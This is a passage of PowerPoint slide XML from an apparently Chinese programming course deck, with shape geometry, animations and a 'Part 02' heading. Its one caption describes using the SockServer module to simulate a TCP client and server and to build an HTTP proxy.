            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681006" y="3499305"/>
            <a:ext cx="5859994" cy="725170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SockServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>客户端和服务端模拟，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP Proxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1335838">
            <a:off x="9471801" y="2622912"/>
            <a:ext cx="672608" cy="674134"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 250 w 744"/>
              <a:gd name="T1" fmla="*/ 0 h 745"/>
              <a:gd name="T2" fmla="*/ 220 w 744"/>
              <a:gd name="T3" fmla="*/ 6 h 745"/>
              <a:gd name="T4" fmla="*/ 125 w 744"/>
              <a:gd name="T5" fmla="*/ 126 h 745"/>
              <a:gd name="T6" fmla="*/ 5 w 744"/>
              <a:gd name="T7" fmla="*/ 221 h 745"/>
              <a:gd name="T8" fmla="*/ 0 w 744"/>
              <a:gd name="T9" fmla="*/ 249 h 745"/>
              <a:gd name="T10" fmla="*/ 23 w 744"/>
              <a:gd name="T11" fmla="*/ 372 h 745"/>
              <a:gd name="T12" fmla="*/ 23 w 744"/>
              <a:gd name="T13" fmla="*/ 372 h 745"/>
              <a:gd name="T14" fmla="*/ 23 w 744"/>
              <a:gd name="T15" fmla="*/ 372 h 745"/>
              <a:gd name="T16" fmla="*/ 0 w 744"/>
              <a:gd name="T17" fmla="*/ 494 h 745"/>
              <a:gd name="T18" fmla="*/ 5 w 744"/>
              <a:gd name="T19" fmla="*/ 524 h 745"/>
              <a:gd name="T20" fmla="*/ 125 w 744"/>
              <a:gd name="T21" fmla="*/ 619 h 745"/>
              <a:gd name="T22" fmla="*/ 220 w 744"/>
              <a:gd name="T23" fmla="*/ 739 h 745"/>
              <a:gd name="T24" fmla="*/ 249 w 744"/>
              <a:gd name="T25" fmla="*/ 744 h 745"/>
              <a:gd name="T26" fmla="*/ 310 w 744"/>
              <a:gd name="T27" fmla="*/ 733 h 745"/>
              <a:gd name="T28" fmla="*/ 372 w 744"/>
              <a:gd name="T29" fmla="*/ 721 h 745"/>
              <a:gd name="T30" fmla="*/ 372 w 744"/>
              <a:gd name="T31" fmla="*/ 721 h 745"/>
              <a:gd name="T32" fmla="*/ 494 w 744"/>
              <a:gd name="T33" fmla="*/ 745 h 745"/>
              <a:gd name="T34" fmla="*/ 524 w 744"/>
              <a:gd name="T35" fmla="*/ 739 h 745"/>
              <a:gd name="T36" fmla="*/ 619 w 744"/>
              <a:gd name="T37" fmla="*/ 619 h 745"/>
              <a:gd name="T38" fmla="*/ 739 w 744"/>
              <a:gd name="T39" fmla="*/ 524 h 745"/>
              <a:gd name="T40" fmla="*/ 744 w 744"/>
              <a:gd name="T41" fmla="*/ 496 h 745"/>
              <a:gd name="T42" fmla="*/ 721 w 744"/>
              <a:gd name="T43" fmla="*/ 372 h 745"/>
              <a:gd name="T44" fmla="*/ 721 w 744"/>
              <a:gd name="T45" fmla="*/ 372 h 745"/>
              <a:gd name="T46" fmla="*/ 721 w 744"/>
              <a:gd name="T47" fmla="*/ 372 h 745"/>
              <a:gd name="T48" fmla="*/ 744 w 744"/>
              <a:gd name="T49" fmla="*/ 251 h 745"/>
              <a:gd name="T50" fmla="*/ 739 w 744"/>
              <a:gd name="T51" fmla="*/ 221 h 745"/>
              <a:gd name="T52" fmla="*/ 619 w 744"/>
              <a:gd name="T53" fmla="*/ 126 h 745"/>
              <a:gd name="T54" fmla="*/ 524 w 744"/>
              <a:gd name="T55" fmla="*/ 6 h 745"/>
              <a:gd name="T56" fmla="*/ 495 w 744"/>
              <a:gd name="T57" fmla="*/ 0 h 745"/>
              <a:gd name="T58" fmla="*/ 433 w 744"/>
              <a:gd name="T59" fmla="*/ 12 h 745"/>
              <a:gd name="T60" fmla="*/ 372 w 744"/>
              <a:gd name="T61" fmla="*/ 24 h 745"/>
              <a:gd name="T62" fmla="*/ 372 w 744"/>
              <a:gd name="T63" fmla="*/ 24 h 745"/>
              <a:gd name="T64" fmla="*/ 250 w 744"/>
              <a:gd name="T65" fmla="*/ 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4" h="745">
                <a:moveTo>
                  <a:pt x="250" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="240" y="0"/>
                  <a:pt x="230" y="2"/>
                  <a:pt x="220" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="173" y="25"/>
                  <a:pt x="159" y="92"/>
                  <a:pt x="125" y="126"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90" y="161"/>
                  <a:pt x="24" y="176"/>
                  <a:pt x="5" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="230"/>
                  <a:pt x="0" y="239"/>
                  <a:pt x="0" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="289"/>
                  <a:pt x="23" y="333"/>
                  <a:pt x="23" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="410"/>
                  <a:pt x="0" y="454"/>
                  <a:pt x="0" y="494"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="505"/>
                  <a:pt x="1" y="515"/>
                  <a:pt x="5" y="524"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="571"/>
                  <a:pt x="91" y="586"/>
                  <a:pt x="125" y="619"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="654"/>
                  <a:pt x="175" y="721"/>
                  <a:pt x="220" y="739"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="229" y="743"/>
                  <a:pt x="239" y="744"/>
                  <a:pt x="249" y="744"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="268" y="744"/>
                  <a:pt x="289" y="739"/>
                  <a:pt x="310" y="733"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="331" y="727"/>
                  <a:pt x="352" y="721"/>
                  <a:pt x="372" y="721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="721"/>
                  <a:pt x="372" y="721"/>
                  <a:pt x="372" y="721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="410" y="721"/>
                  <a:pt x="454" y="745"/>
                  <a:pt x="494" y="745"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="504" y="745"/>
                  <a:pt x="514" y="743"/>
                  <a:pt x="524" y="739"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="571" y="720"/>
                  <a:pt x="585" y="653"/>
                  <a:pt x="619" y="619"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="653" y="584"/>
                  <a:pt x="720" y="569"/>
                  <a:pt x="739" y="524"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="742" y="515"/>
                  <a:pt x="744" y="506"/>
                  <a:pt x="744" y="496"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="744" y="456"/>
                  <a:pt x="721" y="412"/>
                  <a:pt x="721" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="721" y="335"/>
                  <a:pt x="744" y="291"/>
                  <a:pt x="744" y="251"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="744" y="240"/>
                  <a:pt x="743" y="230"/>
                  <a:pt x="739" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="719" y="174"/>
                  <a:pt x="652" y="159"/>
                  <a:pt x="619" y="126"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="584" y="91"/>
                  <a:pt x="569" y="24"/>
                  <a:pt x="524" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="515" y="2"/>
                  <a:pt x="505" y="0"/>
                  <a:pt x="495" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="475" y="0"/>
                  <a:pt x="454" y="6"/>
                  <a:pt x="433" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="413" y="18"/>
                  <a:pt x="392" y="24"/>
                  <a:pt x="372" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="24"/>
                  <a:pt x="372" y="24"/>
                  <a:pt x="372" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="24"/>
                  <a:pt x="290" y="0"/>
                  <a:pt x="250" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:alpha val="90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                  <a:alpha val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="80000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9507010" y="2658225"/>
            <a:ext cx="602190" cy="603506"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 753 w 772"/>
              <a:gd name="T1" fmla="*/ 235 h 773"/>
              <a:gd name="T2" fmla="*/ 735 w 772"/>
              <a:gd name="T3" fmla="*/ 386 h 773"/>
              <a:gd name="T4" fmla="*/ 753 w 772"/>
              <a:gd name="T5" fmla="*/ 538 h 773"/>
              <a:gd name="T6" fmla="*/ 633 w 772"/>
              <a:gd name="T7" fmla="*/ 633 h 773"/>
              <a:gd name="T8" fmla="*/ 538 w 772"/>
              <a:gd name="T9" fmla="*/ 753 h 773"/>
              <a:gd name="T10" fmla="*/ 386 w 772"/>
              <a:gd name="T11" fmla="*/ 735 h 773"/>
              <a:gd name="T12" fmla="*/ 324 w 772"/>
              <a:gd name="T13" fmla="*/ 747 h 773"/>
              <a:gd name="T14" fmla="*/ 234 w 772"/>
              <a:gd name="T15" fmla="*/ 753 h 773"/>
              <a:gd name="T16" fmla="*/ 139 w 772"/>
              <a:gd name="T17" fmla="*/ 633 h 773"/>
              <a:gd name="T18" fmla="*/ 19 w 772"/>
              <a:gd name="T19" fmla="*/ 538 h 773"/>
              <a:gd name="T20" fmla="*/ 37 w 772"/>
              <a:gd name="T21" fmla="*/ 386 h 773"/>
              <a:gd name="T22" fmla="*/ 19 w 772"/>
              <a:gd name="T23" fmla="*/ 235 h 773"/>
              <a:gd name="T24" fmla="*/ 139 w 772"/>
              <a:gd name="T25" fmla="*/ 140 h 773"/>
              <a:gd name="T26" fmla="*/ 234 w 772"/>
              <a:gd name="T27" fmla="*/ 20 h 773"/>
              <a:gd name="T28" fmla="*/ 386 w 772"/>
              <a:gd name="T29" fmla="*/ 38 h 773"/>
              <a:gd name="T30" fmla="*/ 447 w 772"/>
              <a:gd name="T31" fmla="*/ 26 h 773"/>
              <a:gd name="T32" fmla="*/ 538 w 772"/>
              <a:gd name="T33" fmla="*/ 20 h 773"/>
              <a:gd name="T34" fmla="*/ 633 w 772"/>
              <a:gd name="T35" fmla="*/ 140 h 773"/>
              <a:gd name="T36" fmla="*/ 753 w 772"/>
              <a:gd name="T37" fmla="*/ 235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2" h="773">
                <a:moveTo>
                  <a:pt x="753" y="235"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="772" y="281"/>
                  <a:pt x="735" y="339"/>
                  <a:pt x="735" y="386"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="735" y="436"/>
                  <a:pt x="771" y="493"/>
                  <a:pt x="753" y="538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="734" y="583"/>
                  <a:pt x="667" y="598"/>
                  <a:pt x="633" y="633"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="599" y="667"/>
                  <a:pt x="585" y="734"/>
                  <a:pt x="538" y="753"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="491" y="773"/>
                  <a:pt x="434" y="735"/>
                  <a:pt x="386" y="735"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="366" y="735"/>
                  <a:pt x="345" y="741"/>
                  <a:pt x="324" y="747"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="756"/>
                  <a:pt x="261" y="764"/>
                  <a:pt x="234" y="753"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="189" y="735"/>
                  <a:pt x="174" y="668"/>
                  <a:pt x="139" y="633"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="600"/>
                  <a:pt x="39" y="585"/>
                  <a:pt x="19" y="538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="492"/>
                  <a:pt x="37" y="434"/>
                  <a:pt x="37" y="386"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="337"/>
                  <a:pt x="1" y="279"/>
                  <a:pt x="19" y="235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="190"/>
                  <a:pt x="104" y="175"/>
                  <a:pt x="139" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="173" y="106"/>
                  <a:pt x="187" y="39"/>
                  <a:pt x="234" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="281" y="0"/>
                  <a:pt x="338" y="38"/>
                  <a:pt x="386" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="406" y="38"/>
                  <a:pt x="427" y="32"/>
                  <a:pt x="447" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="479" y="17"/>
                  <a:pt x="511" y="9"/>
                  <a:pt x="538" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="583" y="38"/>
                  <a:pt x="598" y="105"/>
                  <a:pt x="633" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="666" y="173"/>
                  <a:pt x="733" y="188"/>
                  <a:pt x="753" y="235"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:alpha val="90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                  <a:alpha val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="80000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3592956" y="2959978"/>
            <a:ext cx="1513840" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Part </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="直接连接符 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778443" y="3499305"/>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9"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out)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>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10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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.02761 -1.48148E-6 L 0.20768 -1.48148E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="11758" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.028 -1.48148E-6 L 2.91667E-6 -1.48148E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="1393" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="31" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="90"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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3" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="1" animBg="1"/>
      <p:bldP spid="14" grpId="2" animBg="1"/>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3137133" y="429460"/>
            <a:ext cx="417211" cy="1495661"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1"/>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
              </a:path>
              <a:tileRect/>
            </a:gradFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="127000" dist="63500" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="27000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>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3015213" y="2455745"/>
            <a:ext cx="417211" cy="1495661"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1"/>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
              </a:path>
              <a:tileRect/>
            </a:gradFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="127000" dist="63500" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="27000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="椭圆 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
